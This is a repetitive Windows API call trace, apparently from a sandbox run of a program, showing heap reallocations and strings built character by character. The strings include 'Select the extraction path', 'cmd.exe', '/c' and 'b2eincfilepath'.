[0082.678] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.678] GetLastError () returned 0x0 [0082.678] SetLastError (dwErrCode=0x0) [0082.678] wcslen (_String="Select the extracti") returned 0x13 [0082.678] wcslen (_String="o") returned 0x1 [0082.679] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x32) returned 0x24146b8 [0082.679] GetLastError () returned 0x0 [0082.679] SetLastError (dwErrCode=0x0) [0082.679] GetLastError () returned 0x0 [0082.679] SetLastError (dwErrCode=0x0) [0082.679] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.679] GetLastError () returned 0x0 [0082.679] SetLastError (dwErrCode=0x0) [0082.679] wcslen (_String="Select the extractio") returned 0x14 [0082.679] wcslen (_String="n") returned 0x1 [0082.679] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x34) returned 0x24146b8 [0082.679] GetLastError () returned 0x0 [0082.679] SetLastError (dwErrCode=0x0) [0082.679] GetLastError () returned 0x0 [0082.679] SetLastError (dwErrCode=0x0) [0082.680] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.680] GetLastError () returned 0x0 [0082.680] SetLastError (dwErrCode=0x0) [0082.680] wcslen (_String="Select the extraction") returned 0x15 [0082.680] wcslen (_String=" ") returned 0x1 [0082.680] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x36) returned 0x24146b8 [0082.680] GetLastError () returned 0x0 [0082.680] SetLastError (dwErrCode=0x0) [0082.680] GetLastError () returned 0x0 [0082.680] SetLastError (dwErrCode=0x0) [0082.681] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.681] GetLastError () returned 0x0 [0082.681] SetLastError (dwErrCode=0x0) [0082.681] wcslen (_String="Select the extraction ") returned 0x16 [0082.681] wcslen (_String="p") returned 0x1 [0082.681] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x38) returned 0x24146b8 [0082.681] GetLastError () returned 0x0 [0082.681] SetLastError (dwErrCode=0x0) [0082.681] GetLastError () returned 0x0 [0082.682] SetLastError (dwErrCode=0x0) [0082.682] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.682] GetLastError () returned 0x0 [0082.682] SetLastError (dwErrCode=0x0) [0082.682] wcslen (_String="Select the extraction p") returned 0x17 [0082.682] wcslen (_String="a") returned 0x1 [0082.682] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x3a) returned 0x24146b8 [0082.683] GetLastError () returned 0x0 [0082.683] SetLastError (dwErrCode=0x0) [0082.683] GetLastError () returned 0x0 [0082.683] SetLastError (dwErrCode=0x0) [0082.683] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.683] GetLastError () returned 0x0 [0082.683] SetLastError (dwErrCode=0x0) [0082.683] wcslen (_String="Select the extraction pa") returned 0x18 [0082.684] wcslen (_String="t") returned 0x1 [0082.684] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x3c) returned 0x24146b8 [0082.684] GetLastError () returned 0x0 [0082.684] SetLastError (dwErrCode=0x0) [0082.684] GetLastError () returned 0x0 [0082.684] SetLastError (dwErrCode=0x0) [0082.684] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.684] GetLastError () returned 0x0 [0082.684] SetLastError (dwErrCode=0x0) [0082.684] wcslen (_String="Select the extraction pat") returned 0x19 [0082.684] wcslen (_String="h") returned 0x1 [0082.684] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24146b8, Size=0x3e) returned 0x24146b8 [0082.684] GetLastError () returned 0x0 [0082.684] SetLastError (dwErrCode=0x0) [0082.684] GetLastError () returned 0x0 [0082.684] SetLastError (dwErrCode=0x0) [0082.685] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.685] GetLastError () returned 0x0 [0082.685] SetLastError (dwErrCode=0x0) [0082.685] wcslen (_String="c") returned 0x1 [0082.685] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xc) returned 0x2414700 [0082.685] GetLastError () returned 0x0 [0082.685] SetLastError (dwErrCode=0x0) [0082.685] GetLastError () returned 0x0 [0082.685] SetLastError (dwErrCode=0x0) [0082.685] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.685] GetLastError () returned 0x0 [0082.685] SetLastError (dwErrCode=0x0) [0082.685] wcslen (_String="c") returned 0x1 [0082.685] wcslen (_String="m") returned 0x1 [0082.685] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2414700, Size=0xe) returned 0x2414700 [0082.685] GetLastError () returned 0x0 [0082.685] SetLastError (dwErrCode=0x0) [0082.685] GetLastError () returned 0x0 [0082.685] SetLastError (dwErrCode=0x0) [0082.686] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.686] GetLastError () returned 0x0 [0082.686] SetLastError (dwErrCode=0x0) [0082.686] wcslen (_String="cm") returned 0x2 [0082.686] wcslen (_String="d") returned 0x1 [0082.686] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2414700, Size=0x10) returned 0x2414700 [0082.686] GetLastError () returned 0x0 [0082.686] SetLastError (dwErrCode=0x0) [0082.686] GetLastError () returned 0x0 [0082.686] SetLastError (dwErrCode=0x0) [0082.686] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.686] GetLastError () returned 0x0 [0082.686] SetLastError (dwErrCode=0x0) [0082.686] wcslen (_String=".") returned 0x1 [0082.686] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xc) returned 0x2414718 [0082.686] GetLastError () returned 0x0 [0082.687] SetLastError (dwErrCode=0x0) [0082.687] GetLastError () returned 0x0 [0082.687] SetLastError (dwErrCode=0x0) [0082.687] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.687] GetLastError () returned 0x0 [0082.687] SetLastError (dwErrCode=0x0) [0082.687] wcslen (_String=".") returned 0x1 [0082.687] wcslen (_String="e") returned 0x1 [0082.687] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2414718, Size=0xe) returned 0x2414718 [0082.687] GetLastError () returned 0x0 [0082.687] SetLastError (dwErrCode=0x0) [0082.687] GetLastError () returned 0x0 [0082.687] SetLastError (dwErrCode=0x0) [0082.687] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.687] GetLastError () returned 0x0 [0082.687] SetLastError (dwErrCode=0x0) [0082.687] wcslen (_String=".e") returned 0x2 [0082.687] wcslen (_String="x") returned 0x1 [0082.687] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2414718, Size=0x10) returned 0x2414718 [0082.687] GetLastError () returned 0x0 [0082.687] SetLastError (dwErrCode=0x0) [0082.687] GetLastError () returned 0x0 [0082.688] SetLastError (dwErrCode=0x0) [0082.688] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.688] GetLastError () returned 0x0 [0082.688] SetLastError (dwErrCode=0x0) [0082.688] wcslen (_String=".ex") returned 0x3 [0082.688] wcslen (_String="e") returned 0x1 [0082.688] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2414718, Size=0x12) returned 0x2414718 [0082.688] GetLastError () returned 0x0 [0082.688] SetLastError (dwErrCode=0x0) [0082.688] GetLastError () returned 0x0 [0082.688] SetLastError (dwErrCode=0x0) [0082.688] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.688] GetLastError () returned 0x0 [0082.688] SetLastError (dwErrCode=0x0) [0082.688] wcslen (_String="/") returned 0x1 [0082.688] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xc) returned 0x2414738 [0082.688] GetLastError () returned 0x0 [0082.688] SetLastError (dwErrCode=0x0) [0082.689] GetLastError () returned 0x0 [0082.689] SetLastError (dwErrCode=0x0) [0082.689] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.689] GetLastError () returned 0x0 [0082.689] SetLastError (dwErrCode=0x0) [0082.689] wcslen (_String="/") returned 0x1 [0082.689] wcslen (_String="c") returned 0x1 [0082.689] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2414738, Size=0xe) returned 0x2414738 [0082.689] GetLastError () returned 0x0 [0082.689] SetLastError (dwErrCode=0x0) [0082.689] GetLastError () returned 0x0 [0082.689] SetLastError (dwErrCode=0x0) [0082.689] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.689] GetLastError () returned 0x0 [0082.689] SetLastError (dwErrCode=0x0) [0082.689] wcslen (_String="b") returned 0x1 [0082.689] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xc) returned 0x24104a0 [0082.690] GetLastError () returned 0x0 [0082.691] SetLastError (dwErrCode=0x0) [0082.691] GetLastError () returned 0x0 [0082.691] SetLastError (dwErrCode=0x0) [0082.691] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.691] GetLastError () returned 0x0 [0082.691] SetLastError (dwErrCode=0x0) [0082.691] wcslen (_String="b") returned 0x1 [0082.691] wcslen (_String="2") returned 0x1 [0082.691] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104a0, Size=0xe) returned 0x24104a0 [0082.691] GetLastError () returned 0x0 [0082.691] SetLastError (dwErrCode=0x0) [0082.691] GetLastError () returned 0x0 [0082.691] SetLastError (dwErrCode=0x0) [0082.691] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.691] GetLastError () returned 0x0 [0082.691] SetLastError (dwErrCode=0x0) [0082.691] wcslen (_String="b2") returned 0x2 [0082.691] wcslen (_String="e") returned 0x1 [0082.692] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104a0, Size=0x10) returned 0x24104a0 [0082.692] GetLastError () returned 0x0 [0082.692] SetLastError (dwErrCode=0x0) [0082.692] GetLastError () returned 0x0 [0082.692] SetLastError (dwErrCode=0x0) [0082.692] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.692] GetLastError () returned 0x0 [0082.692] SetLastError (dwErrCode=0x0) [0082.692] wcslen (_String="b2e") returned 0x3 [0082.692] wcslen (_String="i") returned 0x1 [0082.692] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104a0, Size=0x12) returned 0x24104a0 [0082.692] GetLastError () returned 0x0 [0082.692] SetLastError (dwErrCode=0x0) [0082.692] GetLastError () returned 0x0 [0082.722] SetLastError (dwErrCode=0x0) [0082.722] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.722] GetLastError () returned 0x0 [0082.722] SetLastError (dwErrCode=0x0) [0082.722] wcslen (_String="b2ei") returned 0x4 [0082.722] wcslen (_String="n") returned 0x1 [0082.722] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104a0, Size=0x14) returned 0x24104a0 [0082.722] GetLastError () returned 0x0 [0082.722] SetLastError (dwErrCode=0x0) [0082.722] GetLastError () returned 0x0 [0082.722] SetLastError (dwErrCode=0x0) [0082.722] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.722] GetLastError () returned 0x0 [0082.722] SetLastError (dwErrCode=0x0) [0082.723] wcslen (_String="b2ein") returned 0x5 [0082.723] wcslen (_String="c") returned 0x1 [0082.723] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104a0, Size=0x16) returned 0x24104a0 [0082.723] GetLastError () returned 0x0 [0082.723] SetLastError (dwErrCode=0x0) [0082.723] GetLastError () returned 0x0 [0082.723] SetLastError (dwErrCode=0x0) [0082.723] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.723] GetLastError () returned 0x0 [0082.723] SetLastError (dwErrCode=0x0) [0082.723] wcslen (_String="b2einc") returned 0x6 [0082.723] wcslen (_String="f") returned 0x1 [0082.723] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104a0, Size=0x18) returned 0x24104a0 [0082.723] GetLastError () returned 0x0 [0082.723] SetLastError (dwErrCode=0x0) [0082.723] GetLastError () returned 0x0 [0082.723] SetLastError (dwErrCode=0x0) [0082.723] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.723] GetLastError () returned 0x0 [0082.724] SetLastError (dwErrCode=0x0) [0082.724] wcslen (_String="b2eincf") returned 0x7 [0082.724] wcslen (_String="i") returned 0x1 [0082.724] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104a0, Size=0x1a) returned 0x24104a0 [0082.724] GetLastError () returned 0x0 [0082.724] SetLastError (dwErrCode=0x0) [0082.724] GetLastError () returned 0x0 [0082.724] SetLastError (dwErrCode=0x0) [0082.724] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.724] GetLastError () returned 0x0 [0082.724] SetLastError (dwErrCode=0x0) [0082.724] wcslen (_String="b2eincfi") returned 0x8 [0082.724] wcslen (_String="l") returned 0x1 [0082.724] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104a0, Size=0x1c) returned 0x24104a0 [0082.724] GetLastError () returned 0x0 [0082.724] SetLastError (dwErrCode=0x0) [0082.724] GetLastError () returned 0x0 [0082.725] SetLastError (dwErrCode=0x0) [0082.725] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.725] GetLastError () returned 0x0 [0082.725] SetLastError (dwErrCode=0x0) [0082.725] wcslen (_String="b2eincfil") returned 0x9 [0082.725] wcslen (_String="e") returned 0x1 [0082.725] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104a0, Size=0x1e) returned 0x24104a0 [0082.725] GetLastError () returned 0x0 [0082.725] SetLastError (dwErrCode=0x0) [0082.725] GetLastError () returned 0x0 [0082.725] SetLastError (dwErrCode=0x0) [0082.725] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.725] GetLastError () returned 0x0 [0082.725] SetLastError (dwErrCode=0x0) [0082.725] wcslen (_String="b2eincfile") returned 0xa [0082.725] wcslen (_String="p") returned 0x1 [0082.725] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104a0, Size=0x20) returned 0x24104a0 [0082.725] GetLastError () returned 0x0 [0082.726] SetLastError (dwErrCode=0x0) [0082.726] GetLastError () returned 0x0 [0082.726] SetLastError (dwErrCode=0x0) [0082.726] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.726] GetLastError () returned 0x0 [0082.726] SetLastError (dwErrCode=0x0) [0082.726] wcslen (_String="b2eincfilep") returned 0xb [0082.726] wcslen (_String="a") returned 0x1 [0082.726] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104a0, Size=0x22) returned 0x24104a0 [0082.726] GetLastError () returned 0x0 [0082.726] SetLastError (dwErrCode=0x0) [0082.726] GetLastError () returned 0x0 [0082.726] SetLastError (dwErrCode=0x0) [0082.726] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.726] GetLastError () returned 0x0 [0082.726] SetLastError (dwErrCode=0x0) [0082.726] wcslen (_String="b2eincfilepa") returned 0xc [0082.726] wcslen (_String="t") returned 0x1 [0082.726] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104a0, Size=0x24) returned 0x24104a0 [0082.727] GetLastError () returned 0x0 [0082.727] SetLastError (dwErrCode=0x0) [0082.727] GetLastError () returned 0x0 [0082.727] SetLastError (dwErrCode=0x0) [0082.727] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.727] GetLastError () returned 0x0 [0082.727] SetLastError (dwErrCode=0x0) [0082.727] wcslen (_String="b2eincfilepat") returned 0xd [0082.727] wcslen (_String="h") returned 0x1 [0082.727] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104a0, Size=0x26) returned 0x24104a0 [0082.727] GetLastError () returned 0x0 [0082.727] SetLastError (dwErrCode=0x0) [0082.727] GetLastError () returned 0x0 [0082.727] SetLastError (dwErrCode=0x0) [0082.727] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.727] GetLastError () returned 0x0 [0082.727] SetLastError (dwErrCode=0x0) [0082.728] wcslen (_String="b") returned 0x1 [0082.728] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xc) returned 0x24176f0 [0082.728] GetLastError () returned 0x0 [0082.728] SetLastError (dwErrCode=0x0) [0082.728] GetLastError () returned 0x0 [0082.728] SetLastError (dwErrCode=0x0) [0082.728] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.728] GetLastError () returned 0x0 [0082.728] SetLastError (dwErrCode=0x0) [0082.728] wcslen (_String="b") returned 0x1 [0082.728] wcslen (_String="2") returned 0x1 [0082.728] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24176f0, Size=0xe) returned 0x2417738 [0082.728] GetLastError () returned 0x0 [0082.728] SetLastError (dwErrCode=0x0) [0082.728] GetLastError () returned 0x0 [0082.728] SetLastError (dwErrCode=0x0) [0082.728] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.728] GetLastError () returned 0x0 [0082.729] SetLastError (dwErrCode=0x0) [0082.729] wcslen (_String="b2") returned 0x2 [0082.729] wcslen (_String="e") returned 0x1 [0082.729] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417738, Size=0x10) returned 0x24177e0 [0082.729] GetLastError () returned 0x0 [0082.729] SetLastError (dwErrCode=0x0) [0082.729] GetLastError () returned 0x0 [0082.729] SetLastError (dwErrCode=0x0) [0082.729] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.729] GetLastError () returned 0x0 [0082.729] SetLastError (dwErrCode=0x0) [0082.729] wcslen (_String="b2e") returned 0x3 [0082.729] wcslen (_String="i") returned 0x1 [0082.729] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24177e0, Size=0x12) returned 0x24104d0 [0082.729] GetLastError () returned 0x0 [0082.729] SetLastError (dwErrCode=0x0) [0082.729] GetLastError () returned 0x0 [0082.729] SetLastError (dwErrCode=0x0) [0082.729] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.730] GetLastError () returned 0x0 [0082.730] SetLastError (dwErrCode=0x0) [0082.730] wcslen (_String="b2ei") returned 0x4 [0082.730] wcslen (_String="n") returned 0x1 [0082.730] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104d0, Size=0x14) returned 0x24104d0 [0082.730] GetLastError () returned 0x0 [0082.730] SetLastError (dwErrCode=0x0) [0082.730] GetLastError () returned 0x0 [0082.730] SetLastError (dwErrCode=0x0) [0082.730] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.730] GetLastError () returned 0x0 [0082.730] SetLastError (dwErrCode=0x0) [0082.730] wcslen (_String="b2ein") returned 0x5 [0082.730] wcslen (_String="c") returned 0x1 [0082.730] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104d0, Size=0x16) returned 0x24104d0 [0082.730] GetLastError () returned 0x0 [0082.730] SetLastError (dwErrCode=0x0) [0082.730] GetLastError () returned 0x0 [0082.730] SetLastError (dwErrCode=0x0) [0082.731] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.731] GetLastError () returned 0x0 [0082.731] SetLastError (dwErrCode=0x0) [0082.731] wcslen (_String="b2einc") returned 0x6 [0082.731] wcslen (_String="f") returned 0x1 [0082.731] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104d0, Size=0x18) returned 0x24104d0 [0082.731] GetLastError () returned 0x0 [0082.731] SetLastError (dwErrCode=0x0) [0082.731] GetLastError () returned 0x0 [0082.731] SetLastError (dwErrCode=0x0) [0082.731] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.731] GetLastError () returned 0x0 [0082.731] SetLastError (dwErrCode=0x0) [0082.731] wcslen (_String="b2eincf") returned 0x7 [0082.731] wcslen (_String="i") returned 0x1 [0082.731] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104d0, Size=0x1a) returned 0x24104d0 [0082.731] GetLastError () returned 0x0 [0082.731] SetLastError (dwErrCode=0x0) [0082.731] GetLastError () returned 0x0 [0082.732] SetLastError (dwErrCode=0x0) [0082.732] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.732] GetLastError () returned 0x0 [0082.732] SetLastError (dwErrCode=0x0) [0082.732] wcslen (_String="b2eincfi") returned 0x8 [0082.732] wcslen (_String="l") returned 0x1 [0082.732] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104d0, Size=0x1c) returned 0x24104d0 [0082.732] GetLastError () returned 0x0 [0082.732] SetLastError (dwErrCode=0x0) [0082.732] GetLastError () returned 0x0 [0082.732] SetLastError (dwErrCode=0x0) [0082.732] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.732] GetLastError () returned 0x0 [0082.732] SetLastError (dwErrCode=0x0) [0082.732] wcslen (_String="b2eincfil") returned 0x9 [0082.732] wcslen (_String="e") returned 0x1 [0082.732] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104d0, Size=0x1e) returned 0x24104d0 [0082.732] GetLastError () returned 0x0 [0082.732] SetLastError (dwErrCode=0x0) [0082.732] GetLastError () returned 0x0 [0082.732] SetLastError (dwErrCode=0x0) [0082.733] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.733] GetLastError () returned 0x0 [0082.733] SetLastError (dwErrCode=0x0) [0082.733] wcslen (_String="b2eincfile") returned 0xa [0082.733] wcslen (_String="c") returned 0x1 [0082.733] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104d0, Size=0x20) returned 0x24104d0 [0082.733] GetLastError () returned 0x0 [0082.733] SetLastError (dwErrCode=0x0) [0082.733] GetLastError () returned 0x0 [0082.733] SetLastError (dwErrCode=0x0) [0082.733] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.733] GetLastError () returned 0x0 [0082.733] SetLastError (dwErrCode=0x0) [0082.733] wcslen (_String="b2eincfilec") returned 0xb [0082.733] wcslen (_String="o") returned 0x1 [0082.733] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104d0, Size=0x22) returned 0x24104d0 [0082.733] GetLastError () returned 0x0 [0082.733] SetLastError (dwErrCode=0x0) [0082.733] GetLastError () returned 0x0 [0082.733] SetLastError (dwErrCode=0x0) [0082.734] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.734] GetLastError () returned 0x0 [0082.734] SetLastError (dwErrCode=0x0) [0082.734] wcslen (_String="b2eincfileco") returned 0xc [0082.734] wcslen (_String="u") returned 0x1 [0082.734] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104d0, Size=0x24) returned 0x24104d0 [0082.734] GetLastError () returned 0x0 [0082.734] SetLastError (dwErrCode=0x0) [0082.734] GetLastError () returned 0x0 [0082.734] SetLastError (dwErrCode=0x0) [0082.734] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.734] GetLastError () returned 0x0 [0082.734] SetLastError (dwErrCode=0x0) [0082.734] wcslen (_String="b2eincfilecou") returned 0xd [0082.734] wcslen (_String="n") returned 0x1 [0082.734] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104d0, Size=0x26) returned 0x24104d0 [0082.734] GetLastError () returned 0x0 [0082.735] SetLastError (dwErrCode=0x0) [0082.735] GetLastError () returned 0x0 [0082.735] SetLastError (dwErrCode=0x0) [0082.735] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.735] GetLastError () returned 0x0 [0082.735] SetLastError (dwErrCode=0x0) [0082.735] wcslen (_String="b2eincfilecoun") returned 0xe [0082.735] wcslen (_String="t") returned 0x1 [0082.735] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24104d0, Size=0x28) returned 0x24104d0 [0082.735] GetLastError () returned 0x0 [0082.735] SetLastError (dwErrCode=0x0) [0082.735] GetLastError () returned 0x0 [0082.735] SetLastError (dwErrCode=0x0) [0082.735] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.735] GetLastError () returned 0x0 [0082.735] SetLastError (dwErrCode=0x0) [0082.735] wcslen (_String="b") returned 0x1 [0082.735] RtlAllocateHeap (HeapHandle=0x2410000, Flags=0x0, Size=0xc) returned 0x2417738 [0082.735] GetLastError () returned 0x0 [0082.735] SetLastError (dwErrCode=0x0) [0082.735] GetLastError () returned 0x0 [0082.736] SetLastError (dwErrCode=0x0) [0082.736] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.736] GetLastError () returned 0x0 [0082.736] SetLastError (dwErrCode=0x0) [0082.736] wcslen (_String="b") returned 0x1 [0082.736] wcslen (_String="2") returned 0x1 [0082.736] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2417738, Size=0xe) returned 0x24177f8 [0082.736] GetLastError () returned 0x0 [0082.736] SetLastError (dwErrCode=0x0) [0082.736] GetLastError () returned 0x0 [0082.736] SetLastError (dwErrCode=0x0) [0082.736] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.736] GetLastError () returned 0x0 [0082.736] SetLastError (dwErrCode=0x0) [0082.736] wcslen (_String="b2") returned 0x2 [0082.736] wcslen (_String="e") returned 0x1 [0082.736] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24177f8, Size=0x10) returned 0x24176d8 [0082.736] GetLastError () returned 0x0 [0082.737] SetLastError (dwErrCode=0x0) [0082.737] GetLastError () returned 0x0 [0082.737] SetLastError (dwErrCode=0x0) [0082.737] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.737] GetLastError () returned 0x0 [0082.737] SetLastError (dwErrCode=0x0) [0082.737] wcslen (_String="b2e") returned 0x3 [0082.737] wcslen (_String="i") returned 0x1 [0082.737] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24176d8, Size=0x12) returned 0x2410500 [0082.737] GetLastError () returned 0x0 [0082.737] SetLastError (dwErrCode=0x0) [0082.737] GetLastError () returned 0x0 [0082.737] SetLastError (dwErrCode=0x0) [0082.737] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x24105c0, Size=0xc) returned 0x24105c0 [0082.737] GetLastError () returned 0x0 [0082.737] SetLastError (dwErrCode=0x0) [0082.737] wcslen (_String="b2ei") returned 0x4 [0082.738] wcslen (_String="n") returned 0x1 [0082.738] RtlReAllocateHeap (Heap=0x2410000, Flags=0x0, Ptr=0x2410500, Size=0x14) returned 0x2410500 [0082.738] GetLastError () returned 0x0 [0082.738] SetLastError (dwErrCode=0x0) 